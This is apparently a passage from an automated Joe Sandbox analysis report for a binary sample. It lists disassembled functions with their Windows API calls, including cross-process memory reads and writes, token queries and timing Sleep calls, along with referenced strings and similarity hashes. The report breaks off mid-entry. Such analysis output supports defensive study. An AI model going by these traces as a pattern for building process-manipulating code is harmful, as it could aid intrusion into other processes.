GetLastError.KERNEL32(?,00B77CE2,?,?,?), ref: 00B78228
GetProcessHeap.KERNEL32(00000008,?,?,00B77CE2,?,?,?), ref: 00B78237
HeapAlloc.KERNEL32(00000000,?,00B77CE2,?,?,?), ref: 00B7823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B78255

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1efe32f0aa4f9bb7bd5cec5778dd9d8a4e5e86e2ca4af22845207f65512e768e
Instruction ID: 5599af3d2369cd2dbfe093f89ed2d99b93e7155fb2d605712c32d3eb9f580b22
Opcode Fuzzy Hash: 1efe32f0aa4f9bb7bd5cec5778dd9d8a4e5e86e2ca4af22845207f65512e768e
Instruction Fuzzy Hash: 7D014B71640205AFDB204FA5DC4DDAB7BACEF8A756B504469F919C3220DE318C00CA60

Function 00B7710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?,?,00B77455), ref: 00B77127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?), ref: 00B77142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?), ref: 00B77150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?), ref: 00B77160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?), ref: 00B7716C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 4613493b170a465d2fa17e2a7488cd7fa1dcf7115ec0748e37a0fd78b2776fb5
Instruction ID: 0539229cdcd327131c39e79a30a88747ae53f845f7115c949583b676766d27d3
Opcode Fuzzy Hash: 4613493b170a465d2fa17e2a7488cd7fa1dcf7115ec0748e37a0fd78b2776fb5
Instruction Fuzzy Hash: 2F01BC76600205EBCB108FA4DC44AAA7BECEB45791F1081B4FD08E3220DF31DD008BA0

Function 00B85244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B85260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B8526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B85276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B85280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B852BC

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: e7348ae71ebe192c07739bd93ad67d6376cf543b5cb9a038158b34f8fa86e112
Instruction ID: 79bb7b0cc83c62db48eb425fb8662ced2f3e2da1d975a88fe0be51b5bae1997f
Opcode Fuzzy Hash: e7348ae71ebe192c07739bd93ad67d6376cf543b5cb9a038158b34f8fa86e112
Instruction Fuzzy Hash: 30010931D01A1ADBCF10AFE4E849AEDBBB8FB09711F400599E981B2150CF305554CBA5

Function 00B7810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B78121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B7812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B7813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B78141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B78157

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b02acff0b362c189ea144be2eb54770690636df205424741440affb0a56944d0
Instruction ID: 821f6bebf0fc027b1f69c71db5a2ca84e0a4649d8db45225026663a80cf7a696
Opcode Fuzzy Hash: b02acff0b362c189ea144be2eb54770690636df205424741440affb0a56944d0
Instruction Fuzzy Hash: 8EF03C71340305AFEB210FA5EC8DEB73BACEF4A655B404065F94A97150CF619941DA60

Function 00B7C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B7C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B7C20E
MessageBeep.USER32(00000000), ref: 00B7C226
KillTimer.USER32(?,0000040A), ref: 00B7C242
EndDialog.USER32(?,00000001), ref: 00B7C25C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: c40c46c750c5f84f02544816a92b219abcfbbb8ce214bb51b8d598e02ac58ae9
Instruction ID: 88cc99a01ad8d7f60cb493c7c960ac0ad62bcc22dba69c0edec034966a006158
Opcode Fuzzy Hash: c40c46c750c5f84f02544816a92b219abcfbbb8ce214bb51b8d598e02ac58ae9
Instruction Fuzzy Hash: 4701A230444305ABEB205FA4ED4EBA67BB8FB01B06F0042ADA596A24E1DFF06944CB90

Function 00B213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00B213BF
StrokeAndFillPath.GDI32(?,?,00B5B888,00000000,?), ref: 00B213DB
SelectObject.GDI32(?,00000000), ref: 00B213EE
DeleteObject.GDI32 ref: 00B21401
StrokePath.GDI32(?), ref: 00B2141C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e225c2793d3ca3af89a4792049a9f211fab7a39e2e090b591f85dc7a1a0df461
Instruction ID: b464b732dc9d08b2d9c98d876e74a9baa378aa9cc7f4fee041a0dd1f07afad4b
Opcode Fuzzy Hash: e225c2793d3ca3af89a4792049a9f211fab7a39e2e090b591f85dc7a1a0df461
Instruction Fuzzy Hash: A2F0CD30004649EBDB359F5AEC8D7A83BE5EB1132AF088265E46D8A1F1CB714596DF50

Function 00B8C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B8C432
CoCreateInstance.OLE32(00BB2D6C,00000000,00000001,00BB2BDC,?), ref: 00B8C44A

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

CoUninitialize.OLE32 ref: 00B8C6B7

Strings

.lnk, xrefs: 00B8C3C6, 00B8C3EE, 00B8C3F8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: d56e53854a2b4fc1edb37d3b4692ef14be720da070371206846a49367d9f137a
Instruction ID: 1c612e40d5c5c85facf4f5106efb5ced4c471caf44c60875ab438194cc49f723
Opcode Fuzzy Hash: d56e53854a2b4fc1edb37d3b4692ef14be720da070371206846a49367d9f137a
Instruction Fuzzy Hash: EAA15CB1104205AFD700EF54D881EAFB7E8FF85354F0049ACF5598B1A2EB71EA49CB62

Function 00B32CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00B40DB6: std::exception::exception.LIBCMT ref: 00B40DEC
Part of subcall function 00B40DB6: __CxxThrowException@8.LIBCMT ref: 00B40E01

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B27A51: _memmove.LIBCMT ref: 00B27AAB

__swprintf.LIBCMT ref: 00B32ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B32D66

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 6535e15d23cf8236aa90f83af5b31aeb79c38ce5e74a13856554e597a68cf9bb
Instruction ID: 76c91503e219fc86b6bed36093f77f46718be8b3dd247afb9f69594a7da76c72
Opcode Fuzzy Hash: 6535e15d23cf8236aa90f83af5b31aeb79c38ce5e74a13856554e597a68cf9bb
Instruction Fuzzy Hash: B1918D71518321AFC714EF24D886C6FB7E4EF85710F14099DF9499B2A1EA30EE44CB56

Function 00B8B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B24750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B24743,?,?,00B237AE,?), ref: 00B24770

CoInitialize.OLE32(00000000), ref: 00B8B9BB
CoCreateInstance.OLE32(00BB2D6C,00000000,00000001,00BB2BDC,?), ref: 00B8B9D4
CoUninitialize.OLE32 ref: 00B8B9F1

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

Strings

.lnk, xrefs: 00B8B99D, 00B8B9AB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 3a862807f38ede405f0b0eb5a621fcfea16d13922d276752b9963b128595926a
Instruction ID: 83704bbefebf7e5af6dfa2e7b0e28a5b96a3911911558484216bf56533e2f491
Opcode Fuzzy Hash: 3a862807f38ede405f0b0eb5a621fcfea16d13922d276752b9963b128595926a
Instruction Fuzzy Hash: 2BA16B756043119FCB14EF24C884D6ABBE5FF89314F148998F8999B3A1CB31ED45CB92

Function 00B4501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B450AD

Part of subcall function 00B500F0: __87except.LIBCMT ref: 00B5012B

Strings

pow, xrefs: 00B45085, 00B450A2

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 3f118e3a6e383e9787f7b07c7b8f100ab4bd8899eb7d2cb3563c62d9e75c85ee
Instruction ID: fb8abe23c95ffbb2087a5e37314420ba29225d604ec533a0afeb6f0b52b41ebd
Opcode Fuzzy Hash: 3f118e3a6e383e9787f7b07c7b8f100ab4bd8899eb7d2cb3563c62d9e75c85ee
Instruction Fuzzy Hash: 8A515A2592CE0197DB217B24C85137E2FD4DB40701F208DD9F8D5863ABEE758ECCAA86

Function 00B36192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B36248
_memmove.LIBCMT ref: 00B362E4
_memset.LIBCMT ref: 00B36308

Strings

ERCP, xrefs: 00B361B3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: cf1f4b6f06054d732a93b6f4ed2c4381676620caf9041438c197ae7420768b99
Instruction ID: 41934f41c9d94d6c3a609422c769847c213c4f491d66268653e841e80b00bcbc
Opcode Fuzzy Hash: cf1f4b6f06054d732a93b6f4ed2c4381676620caf9041438c197ae7420768b99
Instruction Fuzzy Hash: C7516E71900705EBDB24DF69C981BABB7F4EF44314F2085BEE95ADB291E770AA44CB40

Function 00B797F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B79296,?,?,00000034,00000800,?,00000034), ref: 00B814E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B7983F

Part of subcall function 00B81487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00B814B1

Part of subcall function 00B813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00B81409
Part of subcall function 00B813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B7925A,00000034,?,?,00001004,00000000,00000000), ref: 00B81419
Part of subcall function 00B813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B7925A,00000034,?,?,00001004,00000000,00000000), ref: 00B8142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B798AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B798F9

Strings

@, xrefs: 00B79911

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 839e68725deb9e8b73d8c56b200e93617aead1d419056bc8cd3cec51a9e24646
Instruction ID: 9596104e93c13a3394fa463dda4bbb45aa2e3d531868b9e5f9f26da1270c90a9
Opcode Fuzzy Hash: 839e68725deb9e8b73d8c56b200e93617aead1d419056bc8cd3cec51a9e24646
Instruction Fuzzy Hash: BB415176901218BFDB10EFA4CC41EDEBBB8EB49300F148499FA55B7151DA706E45CFA1

Function 00BA7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BAF910,00000000,?,?,?,?), ref: 00BA79DF
GetWindowLongW.USER32 ref: 00BA79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BA7A0C

Strings

SysTreeView32, xrefs: 00BA79B1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e59258c5a1e6eab56e9e8ab268d4ffc83bc4d17e9f6f231fd59dd915ccfea286
Instruction ID: e96b137c57269e5b478d61f32b8a1c23ae7a6ff1e8612a5e331fe72b55698646
Opcode Fuzzy Hash: e59258c5a1e6eab56e9e8ab268d4ffc83bc4d17e9f6f231fd59dd915ccfea286
Instruction Fuzzy Hash: 65319F31248606BBDB118E78DC45BEB77E9EB06324F204766F875932E0DB31ED519B50

Function 00BA73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BA7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BA7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BA7499

Strings

SysMonthCal32, xrefs: 00BA742C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 33e8d05a8d3b6d90d8dbaf7d124e5dc372a6e8813263b2bb662bf00e41dfe0b8
Instruction ID: 42de0c74d002d4871423c9d07ae0e0547f211c875a19c1d7a8772edd1b1b8b5b
Opcode Fuzzy Hash: 33e8d05a8d3b6d90d8dbaf7d124e5dc372a6e8813263b2bb662bf00e41dfe0b8
Instruction Fuzzy Hash: EB21B132548219ABDF218EA4CC42FEA3BA9EB4D724F110154FE156B290DE75AC51CBA0

Function 00BA7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BA7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BA7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BA7C5F

Strings

msctls_updown32, xrefs: 00BA7BC4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c3da07adc6efc9fd98140b258a823fea3743d8850faecbd5593dc8b65b18a8c8
Instruction ID: cc0cba2a01dda1638e115ba6f9bc41d88f6a2ef061447c0cf533edcc019e83a4
Opcode Fuzzy Hash: c3da07adc6efc9fd98140b258a823fea3743d8850faecbd5593dc8b65b18a8c8
Instruction Fuzzy Hash: D9218EB5648209AFDB10DF28DCC1DB637EDEF5A364B140099FA159B3A1DB31EC11CAA0

Function 00BA6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BA6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BA6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BA6D70

Strings

Listbox, xrefs: 00BA6D08

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: cb7df691d82341bf0b86330c8e912231cf06d5b5f577ad5ef40dfd0641309cde
Instruction ID: 7ad4b9c21aea7299f78525f3e3f137b6782155441f4ecd292d72f0a7012c36d4
Opcode Fuzzy Hash: cb7df691d82341bf0b86330c8e912231cf06d5b5f577ad5ef40dfd0641309cde
Instruction Fuzzy Hash: 7921C272604118BFDF118F54CC85FBB3BBAEF8A760F058174FA459B1A0DA719C518BA0

Function 00BA770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BA7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BA7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BA7794

Strings

msctls_trackbar32, xrefs: 00BA7749

